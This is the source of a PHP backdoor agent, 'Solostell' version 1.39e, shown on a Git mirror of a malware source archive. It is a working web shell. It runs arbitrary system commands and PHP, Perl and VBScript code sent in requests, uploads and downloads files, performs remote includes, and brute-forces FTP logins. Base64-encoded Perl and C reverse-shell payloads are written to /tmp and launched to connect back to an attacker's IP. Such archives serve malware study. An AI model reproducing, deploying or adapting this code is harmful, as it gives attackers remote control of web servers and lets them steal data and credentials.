ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-18 17:36:11 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
main
MalwareSourceCode/PHP/Backdoor.PHP.Solostell.a.e

1493 lines
41 KiB
Plaintext
Raw Permalink Normal View History

Add files via upload
2020-10-10 03:02:21 +00:00
<?php
$version = "PHP Agent Version 1.39e (c) ".'s'.'o'.'l'.'o'.'s'.'t'.'e'.'l'.'l'." 2007";
function command($cfe)
{
$res = '';
if(function_exists('exec'))
{
@exec($cfe,$res);
$res = @join("\n",$res);
}
elseif(function_exists('shell_exec'))
{
$res = @shell_exec($cfe);
}
elseif(function_exists('system'))
{
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru'))
{
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r")))
{
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}
return $res;
}
function get_temp_filename()
{
global $unix;
$uqt = "tmpU4g764t";
if ($unix)
{
$tmpfname = @tempnam("/tmp", "tmp");
if (!$tmpfname) $tmpfname = "/tmp/$uqt";
$tmpfile = @fopen($tmpfname,"wb");
if (!$tmpfile)
{
$tmpfname = @tempnam("/var/tmp", "tmp");;
$tmpfile = @fopen($tmpfname,"wb");
}
if (!$tmpfile)
{
$tmpfname = "/var/tmp/$uqt";
$tmpfile = @fopen($tmpfname,"wb");
}
if (!$tmpfile)
{
$tmpfname = "./$uqt";
$tmpfile = @fopen($tmpfname,"wb");
}
if ($tmpfile)
{
@fclose ($tmpfile);
@unlink ($tmpfname);
return $tmpfname;
} else {
return "/tmp/tmpU4g764t";
}
} else {
$tmpdir = getenv("TEMP");
if (empty($tmpdir)) $tmpdir = getenv("TMP");
if (empty($tmpdir)) $tmpdir = "C:\\WINDOWS\\TEMP";
$tmpfname = @tempnam($tmpdir, "tmp");
$tmpfile = @fopen($tmpfname,"wb");
if (!$tmpfile)
{
$tmpfname = "$tmpdir\\$uqt";
$tmpfile = @fopen($tmpfname,"wb");
}
if (!$tmpfile)
{
$tmpfname = ".\\$uqt";
$tmpfile = @fopen($tmpfname,"wb");
}
if ($tmpfile)
{
@fclose ($tmpfile);
@unlink ($tmpfname);
return $tmpfname;
} else {
return "C:\\WINDOWS\\TEMP\\$uqt";
}
}
}
function to_win_name($filename)
{
return preg_replace("/\//", "\\", $filename);
}
function eat_file($filename)
{
global $safe_mode;
global $unix;
$contents = '';
if ($handle = @fopen($filename, "rb"))
{
while (!@feof($handle)) {
$contents .= fread($handle, 8192);
}
@fclose($handle);
} else
{
if (!$safe_mode)
{
$tmpfname = get_temp_filename();
$win_name = to_win_name($filename);
if ($unix) command ("cp '$filename' $tmpfname");
else command ("copy \"$win_name\" $tmpfname");
if ($handle = @fopen($tmpfname, "rb"))
{
while (!@feof($handle)) {
$contents .= fread($handle, 8192);
}
@fclose($handle);
} else {
if ($unix) $contents = command("cat '$filename'");
else $contents = command("type \"$win_name\"");
}
@unlink($tmpfname);
}
}
return $contents;
}
function create_file($fname,$text)
{
$w_file = @fopen($fname,"wb");
if($w_file)
{
@fputs($w_file,$text);
@fclose($w_file);
} else
return false;
return true;
}
function create_file_base64($fname,$text)
{
$w_file=@fopen($fname,"wb");
if($w_file)
{
@fputs($w_file,@base64_decode($text));
@fclose($w_file);
} else
return false;
return true;
}
function which($pr)
{
$path = command("which $pr");
if (!empty($path)) { return $path; } else { return $pr; }
}
class createZip {
var $compressedData = array();
var $centralDirectory = array(); // central directory
var $endOfCentralDirectory = "\x50\x4b\x05\x06\x00\x00\x00\x00"; //end of Central directory record
var $oldOffset = 0;
function addFile($data, $directoryName) {
$directoryName = str_replace("\\", "/", $directoryName);
$feedArrayRow = "\x50\x4b\x03\x04";
$feedArrayRow .= "\x14\x00";
$feedArrayRow .= "\x00\x00";
$feedArrayRow .= "\x08\x00";
$feedArrayRow .= "\x00\x00\x00\x00";
$uncompressedLength = strlen($data);
$compression = crc32($data);
$gzCompressedData = gzcompress($data);
$gzCompressedData = substr( substr($gzCompressedData, 0, strlen($gzCompressedData) - 4), 2);
$compressedLength = strlen($gzCompressedData);
$feedArrayRow .= pack("V",$compression);
$feedArrayRow .= pack("V",$compressedLength);
$feedArrayRow .= pack("V",$uncompressedLength);
$feedArrayRow .= pack("v", strlen($directoryName) );
$feedArrayRow .= pack("v", 0 );
$feedArrayRow .= $directoryName;
$feedArrayRow .= $gzCompressedData;
$feedArrayRow .= pack("V",$compression);
$feedArrayRow .= pack("V",$compressedLength);
$feedArrayRow .= pack("V",$uncompressedLength);
$this -> compressedData[] = $feedArrayRow;
$newOffset = strlen(implode("", $this->compressedData));
$addCentralRecord = "\x50\x4b\x01\x02";
$addCentralRecord .="\x00\x00";
$addCentralRecord .="\x14\x00";
$addCentralRecord .="\x00\x00";
$addCentralRecord .="\x08\x00";
$addCentralRecord .="\x00\x00\x00\x00";
$addCentralRecord .= pack("V",$compression);
$addCentralRecord .= pack("V",$compressedLength);
$addCentralRecord .= pack("V",$uncompressedLength);
$addCentralRecord .= pack("v", strlen($directoryName) );
$addCentralRecord .= pack("v", 0 );
$addCentralRecord .= pack("v", 0 );
$addCentralRecord .= pack("v", 0 );
$addCentralRecord .= pack("v", 0 );
$addCentralRecord .= pack("V", 32 );
$addCentralRecord .= pack("V", $this -> oldOffset );
$this -> oldOffset = $newOffset;
$addCentralRecord .= $directoryName;
$this -> centralDirectory[] = $addCentralRecord;
}
function getZippedfile() {
$data = implode("", $this -> compressedData);
$controlDirectory = implode("", $this -> centralDirectory);
return
$data.
$controlDirectory.
$this -> endOfCentralDirectory.
pack("v", sizeof($this -> centralDirectory)).
pack("v", sizeof($this -> centralDirectory)).
pack("V", strlen($controlDirectory)).
pack("V", strlen($data)).
"\x00\x00";
}
}
function compress(&$filedump)
{
global $content_encoding;
global $mime_type;
if (@function_exists('gzencode'))
{
$content_encoding = 'x-gzip';
$mime_type = 'application/x-gzip';
$filedump = @gzencode($filedump);
}
else
{
$mime_type = 'application/octet-stream';
}
}
function make_zip($files)
{
if (@function_exists('gzcompress'))
{
$zipfile = new createZip();
foreach ($files as $filename)
{
$filedump = eat_file($filename);
$zipfile->addFile($filedump, $filename); # substr($filename, 0, -4));
}
return $zipfile->getZippedfile();
} else {
#TODO: use external commands
return '';
}
}
function perms($mode)
{
if (!$GLOBALS['unix']) return 0;
if( $mode & 0x1000 ) { $type='p'; }
else if( $mode & 0x2000 ) { $type='c'; }
else if( $mode & 0x4000 ) { $type='d'; }
else if( $mode & 0x6000 ) { $type='b'; }
else if( $mode & 0x8000 ) { $type='-'; }
else if( $mode & 0xA000 ) { $type='l'; }
else if( $mode & 0xC000 ) { $type='s'; }
else $type='u';
$owner["read"] = ($mode & 00400) ? 'r' : '-';
$owner["write"] = ($mode & 00200) ? 'w' : '-';
$owner["execute"] = ($mode & 00100) ? 'x' : '-';
$group["read"] = ($mode & 00040) ? 'r' : '-';
$group["write"] = ($mode & 00020) ? 'w' : '-';
$group["execute"] = ($mode & 00010) ? 'x' : '-';
$world["read"] = ($mode & 00004) ? 'r' : '-';
$world["write"] = ($mode & 00002) ? 'w' : '-';
$world["execute"] = ($mode & 00001) ? 'x' : '-';
if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
$s=sprintf("%1s", $type);
$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
return trim($s);
}
function get_cwd()
{
global $safe_mode;
global $unix;
global $HTTP_SERVER_VARS;
$res = '';
if (function_exists('getcwd'))
{
$res = @getcwd();
$res = trim($res);
}
if (empty($res) && function_exists('posix_getcwd'))
{
$res = @posix_getcwd();
}
if (empty($res) && function_exists('realpath'))
{
$res = @realpath(".");
}
if (empty($res) && !$safe_mode)
{
if ($unix)
{
$res = command("pwd");
} else {
$res = command("cd");
}
$res = trim($res);
}
if (empty($res))
{
$selfpath = '';
$selfpath = $HTTP_SERVER_VARS['SCRIPT_FILENAME'];
if (empty($selfpath)) $selfpath = $HTTP_SERVER_VARS['PATH_TRANSLATED'];
if (empty($selfpath)) $selfpath = $HTTP_SERVER_VARS['DOCUMENT_ROOT'].$HTTP_SERVER_VARS['PHP_SELF'];
if (preg_match('/^(.*)[\/\\\\]([^\/\\\\]*)$/', $selfpath, $matches))
{
$res = $matches[1];
} else {
$res = $selfpath;
}
}
if (empty($res) && $_ENV['PWD'])
{
$res = $_ENV['PWD'];
}
return $res;
}
function get_uname()
{
$res = '';
global $unix;
if (empty($res) && function_exists('php_uname'))
{
$res = @php_uname();
}
if (empty($res) && function_exists('posix_uname'))
{
$h = @posix_uname();
foreach ($h as $k=>$v)
{
$res .= "$k=$v ";
}
}
if (empty($res) && !$safe_mode)
{
if ($unix)
{
$res = command("uname -a");
} else {
$res = command("ver");
}
$res = trim($res);
}
if (empty($res))
{
$res = "$_ENV[OSTYPE] $_ENV[OS] $HTTP_SERVER_VARS[SERVER_SOFTWARE]";
}
return $res;
}
function is_unix_os()
{
$dir = @get_cwd();
$unix = 0;
if (strlen($dir)>1 && $dir[1]==":") $unix=0; else $unix=1;
if(empty($dir))
{
$uname = get_uname();
if (@eregi("win",$uname)) { $unix = 0; }
else { $unix = 1; }
}
return $unix;
}
function explode_files ($masklist, $open_dirs = false, $insert_dirnames = false)
{
$masks = preg_split("/(?<!\\\\)\s+/", $masklist, -1, PREG_SPLIT_NO_EMPTY);
$result = array();
foreach ($masks as $mask)
{
$mask = preg_replace("/\\\\ /",' ',$mask);
$glob = array();
if (@file_exists($mask))
{
$glob[] = $mask;
} else {
$glob = @glob($mask);
if (!$glob) continue;
}
foreach ($glob as $cur)
{
if (is_dir($cur) && $open_dirs)
{
$d=@dir($cur);
if ($d)
{
if ($insert_dirnames) $result[] = "$cur:";
if (@substr($cur, -1, 1) != '/') $cur .= '/';
while (false !== ($file=$d->read()) )
{
$result[] = "$cur$file";
}
$d->close();
} else { #error opening dir, treating as file
$result[] = $cur;
}
} else {
$result[] = $cur;
}
}
}
return $result;
}
function safe_dir($dir, $recursive = false, $recursive_limit = 0)
{
global $unix;
global $fast;
$res = '';
if (empty($dir)) $dir = ".";
$files = explode_files($dir,true,true);
$curdirs = array();
if (!$files) return $res;
foreach ($files as $file)
{
#if ($file=="." || $file=="..") continue;
if (@substr($file,-1,1) == ":")
{
$res .= "$file\n";
continue;
}
@clearstatcache();
if (function_exists('stat'))
list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = @stat("$file");
else {
if (!isset($mtime)) $mtime = @filemtime("$file");
if (!isset($uid)) $uid = @fileowner("$file");
if (!isset($gid)) $gid = @filegroup("$file");
if (!isset($inode)) $inode = @fileinode("$file");
if (!isset($size)) $size = @filesize("$file");
}
if (!isset($size)) $size = 0;
#if(!$unix){
# $res .= date("d.m.Y H:i",$mtime);
# if(@is_dir($file)) $res .= " <DIR> "; else $res .= sprintf("% 8s ",$size);
#}
#else
{
$owner = array();
$grpid = array();
if (isset($uid))
{
if (function_exists('posix_getpwuid'))
$owner = @posix_getpwuid($uid);
else
$owner['name'] = $uid;
}
if (empty($owner['name'])) $owner['name'] = '?';
$owner['name'] = trim($owner['name']);
if (isset($gid))
{
if (function_exists('posix_getgrgid'))
$grpid = @posix_getgrgid($gid);
else
$grpid['name'] = $gid;
}
if (empty($grpid['name'])) $grpid['name'] = '?';
$grpid['name'] = trim($grpid['name']);
$res .= sprintf("% 10d ",$inode);
@preg_match('/(^|\/|\\\\)([^\/\\\\]+)$/', $file, $shortname);
if ($unix)
{
$res .= perms(@fileperms("$file"));
} else {
if (@is_dir($file)) $type = 'd';
elseif (@is_file($file)) $type = '-';
elseif (@is_link($file)) $type = 'l';
elseif ($shortname[2] == "." or $shortname[2] == "..") $type = 'd';
else $type = '?';
$res .= $type;
$res .= "rwx---";
if (!$fast)
{
$read = 0; $write = 0;
if ($type == '-')
{
if ($handle = @fopen($file,"rb"))
{
$read = 1;
fclose ($handle);
}
if ($handle = @fopen($file,"ab+"))
{
$write = 1;
fclose($handle);
}
} elseif ($type == 'd')
{
$unique_name = "$file/87never_exists_anywhere54";
if ($handle = @fopen($unique_name, "w+"))
{
$write = 1;
@fclose($handle);
@unlink($unique_name);
}
if ($handle = @opendir($file))
{
$read = 1;
@closedir($handle);
}
}
if ($read) $res .= "r"; else $res .= "-";
if ($write) $res .= "w"; else $res .= "-";
$res .= "x";
} else {
$res .= "???";
}
}
$res .= sprintf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grpid['name'],$size);
$res .= date("d.m.Y H:i ",$mtime);
}
$res .= "$shortname[2]\n";
if (@is_dir("$file"))
{
if ($shortname[2] != "." && $shortname[2] != "..")
$curdirs[] = "$file";
}
}
if ($recursive)
{
foreach ($curdirs as $dirname)
{
if ($recursive_limit <= 0)
{
$res .= "\n";
$res .= safe_dir($dirname, $recursive);
} else {
if ($recursive_limit > 1)
{
$res .= "\n";
$res .= safe_dir($dirname, $recursive, $recursive_limit-1);
}
}
}
}
return $res;
}
function DirFilesR($dir,$types='')
{
global $safe_mode;
$files = Array();
$mark_as_accessable = 0;
if(($handle = @opendir($dir)))
{
while (false !== ($file = @readdir($handle)))
{
if ($file != "." && $file != "..")
{
if (!empty($file) && !$mark_as_accessable)
{
$mark_as_accessable = 1;
$files[] = '';
}
if(@is_dir($dir."/".$file))
$files = @array_merge($files,DirFilesR($dir."/".$file,$types));
else
{
if($types)
{
$pos = @strrpos($file,".");
$ext = @substr($file,$pos,@strlen($file)-$pos);
if(@in_array($ext,explode(';',$types)))
$files[] = $dir."/".$file;
}
else
$files[] = $dir."/".$file;
}
}
}
@closedir($handle);
}
if (!$files && !$safe_mode && !$mark_as_accessable)
{
$listing = command ("ls -1Ra $dir");
$lines = explode("\n", $listing);
$curdir = $dir;
foreach ($lines as $line)
{
$line = trim($line);
if (empty($line)) continue;
if ($line == "." || $line == "..") continue;
if (!$mark_as_accessable)
{
$mark_as_accessable = 1;
$files[] = '';
}
if (preg_match("/^(.*):$/",$line,$matches))
{
$curdir = $matches[1];
} else {
if($types)
{
$pos = @strrpos($line,".");
$ext = @substr($line,$pos,@strlen($line)-$pos);
if(@in_array($ext,explode(';',$types)))
$files[] = "$curdir/$line";
} else
$files[] = "$curdir/$line";
}
}
}
return $files;
}
function ReadRegistry($path)
{
#reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Cache"
}
function U_value($value)
{
if ($value == '') return '';
if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';
if ($value === null) return 'NULL';
if (@is_object($value)) $value = (array) $value;
if (@is_array($value))
{
@ob_start();
print_r($value);
$value = @ob_get_contents();
@ob_end_clean();
}
return $value;
}
$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
#####################################################################
if(version_compare(phpversion(), '4.1.0') == -1)
{
$_POST = &$HTTP_POST_VARS;
$_REQUEST= &$HTTP_POST_VARS;
$_GET = &$HTTP_GET_VARS;
$_SERVER = &$HTTP_SERVER_VARS;
$_COOKIE = &$HTTP_COOKIE_VARS;
}
if (@get_magic_quotes_gpc())
{
foreach ($_GET as $k=>$v)
{
$_GET[$k] = stripslashes($v);
}
foreach ($_POST as $k=>$v)
{
$_POST[$k] = stripslashes($v);
}
foreach ($_REQUEST as $k=>$v)
{
$_REQUEST[$k] = stripslashes($v);
}
foreach ($_COOKIE as $k=>$v)
{
$_COOKIE[$k] = stripslashes($v);
}
}
if (function_exists('error_reporting')) @error_reporting(0);
if (function_exists('set_magic_quotes_runtime')) @set_magic_quotes_runtime(0);
if (function_exists('set_time_limit')) @set_time_limit(0);
if (function_exists('ini_set'))
{
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
#TODO: if version 4.2.3 - 4.0.3.
# @ini_set('upload_max_filesize',"100M");
# if (@ini_get('file_uploads') == false) @ini_set('file_uploads',true);
}
global $safe_mode;
if (function_exists('ini_get'))
{
$safe_mode = @ini_get('safe_mode');
} else {
$safe_mode = 0;
}
global $unix;
$unix = is_unix_os();
if (function_exists('umask'))
{
$umask = 0755;
}
$envelope = isset($_REQUEST['envelope']);
#####################################################################
if ($envelope)
{
echo '__START__9034785902347509238476034857607834__START__';
}
global $output;
$output = '';
global $compress;
$compress = empty($_REQUEST['compress']) ? 0 : $_REQUEST['compress'];
global $use_exec;
$use_exec = empty($_REQUEST['use_exec']) ? 0 : $_REQUEST['use_exec'];
global $fast;
$fast = empty($_REQUEST['rfast']) ? 0 : $_REQUEST['rfast'];
if (!empty($_REQUEST['not_exec']) && $_REQUEST['not_exec']) $safe_mode = 1;
$scmd = empty($_REQUEST['spec']) ? '' : $_REQUEST['spec'];
if (empty($scmd))
$scmd = empty($_REQUEST['scmd']) ? '' : $_REQUEST['scmd'];
$cfe = empty($_REQUEST['cfe']) ? '' : $_REQUEST['cfe'];
if (empty($cfe))
$cfe = empty($_REQUEST['rcmd']) ? '' : $_REQUEST['rcmd'];
$ffr = empty($_REQUEST['rfile']) ? '' : $_REQUEST['rfile'];
$ffrs = empty($_REQUEST['rfiles']) ? '' : $_REQUEST['rfiles'];
$dfr = empty($_REQUEST['rdir']) ? '' : $_REQUEST['rdir'];
$dfra = empty($_REQUEST['rdirall']) ? '' : $_REQUEST['rdirall'];
$info = empty($_REQUEST['rinfo']) ? '' : $_REQUEST['rinfo'];
if (!empty($HTTP_POST_FILES['userfile']['name']))
{
if(!empty($_REQUEST['rname']))
{
$nfn = $_REQUEST['rname'];
} else {
$nfn = $HTTP_POST_FILES['userfile']['name'];
}
$tmp_name = $HTTP_POST_FILES['userfile']['tmp_name'];
$tmp_size = $HTTP_POST_FILES['userfile']['size'];
$upload_file = @fopen($tmp_name, "rb");
if ($upload_file) $target_file = @fopen($nfn, "wb");
if ($target_file && $upload_file && !$use_exec)
{
$write_data = @fread($upload_file, $tmp_size);
@fwrite($target_file, $write_data);
@fclose($target_file);
@fclose($upload_file);
echo "1\n$nfn upload by fwrite ok";
} else {
if ($target_file) @fclose($target_file);
if ($upload_file) @fclose($upload_file);
if (!$use_exec && @copy($tmp_name, $nfn))
{
echo "1\n$nfn upload by copy ok";
} else {
$cmd = "cp $tmp_name $nfn 2>&1";
echo "@copy failed. Trying $cmd\n";
$cpres = command($cmd);
if (empty($cpres))
{
echo "1\n$nfn upload by cp ok";
} else {
$cmd = "cat $tmp_name >$nfn";
echo "cp failed. Trying $cmd\n";
$cpres = command($cmd);
if (@filesize($nfn) == $tmp_size)
{
echo "1\n$name upload by cat ok";
} else {
echo "0\n$name upload error";
}
}
}
}
}
if (!empty($scmd))
{
if ($scmd == "upload-agent" || $scmd == "upload-data" || $scmd == "upload-url")
{
$agent = '';
if ($scmd == "upload-agent")
{
$aagent = @file(__FILE__);
$agent = @join("", $aagent);
} elseif ($scmd == "upload-data") {
$agent = $_REQUEST['data'];
} elseif ($scmd == "upload-url") {
$agent = @file_get_contents($_REQUEST['rurl']);
}
if (empty($agent))
{
echo "error downloading data\n";
}
if (!empty($agent))
{
$name = $_REQUEST['rname'];
if (empty($name))
{
$name = "agent.php";
}
$file = '';
if (!$use_exec)
$file = @fopen($name,"wb");
if ($file)
{
@fwrite($file, $agent);
@fclose($file);
echo "1\n$name upload ok";
} else {
print "php file restriction is on\n";
$tmpfname = get_temp_filename();
if ($tmpfile = @fopen($tmpfname, "wb"))
{
@fwrite($tmpfile, $agent);
@fclose($tmpfile);
} elseif (!$safe_mode) {
echo "can't open for write any temp file $tmpfname\n";
$esc_agent = @escapeshellarg($agent);
command("echo $esc_agent >$tmpfname");
}
if (!$use_exec && @copy($tmpfname, $name))
{
echo "1\n$name upload ok";
} else {
if (!$safe_mode)
{
$cmd = "cp $tmpfname $name 2>&1";
if (!$unix) $cmd = "copy $tmpfname $name";
echo "@copy failed. Trying $cmd\n";
$cpres = command($cmd);
if (empty($cpres))
{
echo "1\n$name upload ok";
} elseif (!$safe_mode) {
$cmd = "cat $tmpfname >$name";
if (!$unix) $cmd = "type $tmpfname >$name";
echo "cp failed. Trying $cmd\n";
$cpres = command($cmd);
if (@file_exists($name))
{
echo "1\n$name upload ok";
} else {
echo "0\n$name upload error";
}
}
}
}
@unlink($tmpfname);
}
}
}
if ($scmd == "rm")
{
$masks = $_REQUEST['rname'];
if (!empty($masks))
{
$files = explode_files($masks);
foreach ($files as $file)
{
if ($use_exec || !@unlink($file))
{
if ($unix)
{
$output .= command("rm -f $file");
} else {
$output .= command("del /Q $file");
}
}
}
}
}
if ($scmd == "cp")
{
$name1 = $_REQUEST['rname1'];
$name2 = $_REQUEST['rname2'];
if (!empty($name1) && !empty($name2))
{
if ($use_exec || !@copy($name1, $name2))
{
if ($unix)
{
$output .= command("cp -f $name1 $name2");
} else {
$output .= command("copy /Y $name1 $name2");
}
}
}
}
if ($scmd == "mv")
{
$name1 = $_REQUEST['rname1'];
$name2 = $_REQUEST['rname2'];
if (!empty($name1) && !empty($name2))
{
if ($use_exec || !@rename($name1, $name2))
{
if ($unix)
{
$output .= command("mv -f $name1 $name2");
} else {
$output .= command("move /Y $name1 $name2");
}
}
}
}
if ($scmd == "rmdir")
{
$name = $_REQUEST['rname'];
if (!empty($name))
{
if ($use_exec || !@rmdir($name))
{
$output .= command("rmdir $name");
}
}
}
if ($scmd == "mkdir")
{
$name = $_REQUEST['rname'];
if (!empty($name))
{
if ($use_exec || !@mkdir($name))
{
$output .= command("mkdir $name");
}
}
}
if ($scmd == "chmod")
{
$mode = $_REQUEST['rmode'];
$masks = $_REQUEST['rname'];
if (!empty($masks) && !empty($mode))
{
$files = explode_files($masks);
foreach ($files as $name)
{
if ($use_exec || !@chmod($name,$mode))
{
$output .= command("chmod $mode $name");
}
}
}
}
if ($scmd == "chown")
{
$owner = $_REQUEST['rowner'];
$masks = $_REQUEST['rname'];
if (!empty($masks) && !empty($owner))
{
$files = explode_files($masks);
foreach ($files as $name)
{
if ($use_exec || !@chown($name,$owner))
{
$output .= command("chown $owner $name");
}
}
}
}
if ($scmd == "chgrp")
{
$masks = $_REQUEST['rname'];
$grp = $_REQUEST['rgrp'];
if (!empty($masks) && !empty($grp))
{
$files = explode_files($masks);
foreach ($files as $name)
{
if ($use_exec || !@chgrp($name,$grp))
{
$output .= command("chgrp $grp $name");
}
}
}
}
if ($scmd == "back-perl")
{
$rip = $_REQUEST['rip'] ? $_REQUEST['rip'] : $_SERVER['REMOTE_ADDR'];
$rport = $_REQUEST['rport'] ? $_REQUEST['rport'] : 11457;
create_file_base64("/tmp/back",$back_connect);
$p2=which("perl");
$blah = command($p2." /tmp/back $rip $rport &");
}
if ($scmd == "back-c")
{
$rip = $_REQUEST['rip'] ? $_REQUEST['rip'] : $_SERVER['REMOTE_ADDR'];
$rport = $_REQUEST['rport'] ? $_REQUEST['rport'] : 11457;
create_file_base64("/tmp/back.c",$back_connect_c);
$blah = command("gcc -o /tmp/backc /tmp/back.c");
@unlink("/tmp/back.c");
$blah = command("/tmp/backc $rip $rport &");
}
if ($scmd == "eval-php")
{
$code = $_REQUEST['rcode'];
if (!empty($code))
{
$res = @eval ($code);
if ($res) $output = $res;
if (!empty($output))
{
if ($compress) compress($output);
echo $output;
}
}
}
if ($scmd == "eval-perl")
{
$code = $_REQUEST['rcode'];
if (!empty($code))
{
$p2 = which("perl");
$tmpfname = get_temp_filename();
create_file($tmpfname,$code);
$output = command("$p2 $tmpfname");
@unlink($tmpfname);
if (!empty($output))
{
if ($compress) compress($output);
echo $output;
}
}
}
if ($scmd == "eval-vbs")
{
$code = $_REQUEST['rcode'];
if (!empty($code))
{
$tmpfname = get_temp_filename();
create_file($tmpfname,$code);
$output = command("cscript.exe /Nologo /E:Vbscript $tmpfname");
@unlink($tmpfname);
if (!empty($output))
{
if ($compress) compress($output);
echo $output;
}
}
}
if ($scmd == "include")
{
include($_REQUEST['rurl']);
}
if ($scmd == "search")
{
$pattern = $_REQUEST['pattern'];
$grepmode = !empty($_REQUEST['grepmode']) ? $_REQUEST['grepmode'] : 0;
$files = array();
$output = '';
if (!empty($_REQUEST['tdir']))
{
$exts = $_REQUEST['exts'];
$target = $_REQUEST['tdir'];
$files = DirFilesR($target, $exts);
} elseif (!empty($_REQUEST['tfile'])) {
$files[] = $_REQUEST['tfile'];
}
if ($files)
{
foreach ($files as $file)
{
if (empty($file)) continue;
$content = eat_file($file);
if (!empty($content))
{
if ($grepmode == 0)
{
if (preg_match("$pattern", $content))
$output .= "$file\n";
} else {
$repfile = false;
if (preg_match_all("$pattern", $content, $matches, PREG_PATTERN_ORDER))
{
if ($grepmode == 2 && !$repfile)
{
$output .= "~!$file:\n";
$repfile = true;
}
$tolist = $grepmode == 3 ? $matches[1] : $matches[0];
foreach ($tolist as $match)
{
if ($grepmode == 1)
$output .= "$file:";
$output .= "$match\n";
}
}
}
}
}
} else {
$output = "??? error enumerating target dir/file!\n";
}
if ($compress) compress($output);
echo $output;
}
if ($scmd == "ftp-test")
{
$output = '';
$ftp_server = !empty($_REQUEST['fserver']) ? $_REQUEST['fserver'] : "127.0.0.1";
$ftp_port = !empty($_REQUEST['fport']) ? $_REQUEST['fport'] : 21;
$connection = @ftp_connect ($ftp_server,$ftp_port,10);
if (!$connection) {
$output .= "error connecting to $ftp_server:$ftp_port\n";
} else {
@ftp_close($connection);
$flogins = explode("\n",$_REQUEST['flogins']);
$fpasswords = explode("\n",$_REQUEST['fpasswords']);
$found = false;
foreach ($flogins as $login)
{
if (empty($login)) next;
foreach ($fpasswords as $password)
{
if (empty($password)) next;
$connection = @ftp_connect($ftp_server,$ftp_port,10);
if (!$connection) {
$output .= "$login:$password:-1\n";
} else {
if (@ftp_login($connection,$login,$password))
{
$output .= "$login:$password:1\n";
$found = true;
break;
} else {
$output .= "$login:$password:0\n";
}
@ftp_close($connection);
}
}
if ($found) break;
}
}
}
if ($compress) compress($output);
echo $output;
}
if (!empty($cfe))
{
$output = command($cfe);
if ($compress) compress($output);
echo $output;
}
if (!empty($ffr))
{
if (!$envelope)
{
@header("Content-type: application/octet-stream");
@header("Content-disposition: attachment; filename=\"".$ffr."\";");
}
$output = eat_file($ffr);
if ($compress) compress($output);
echo $output;
}
if (!empty($ffrs))
{
if (!$envelope)
{
@header("Content-type: application/zip");
}
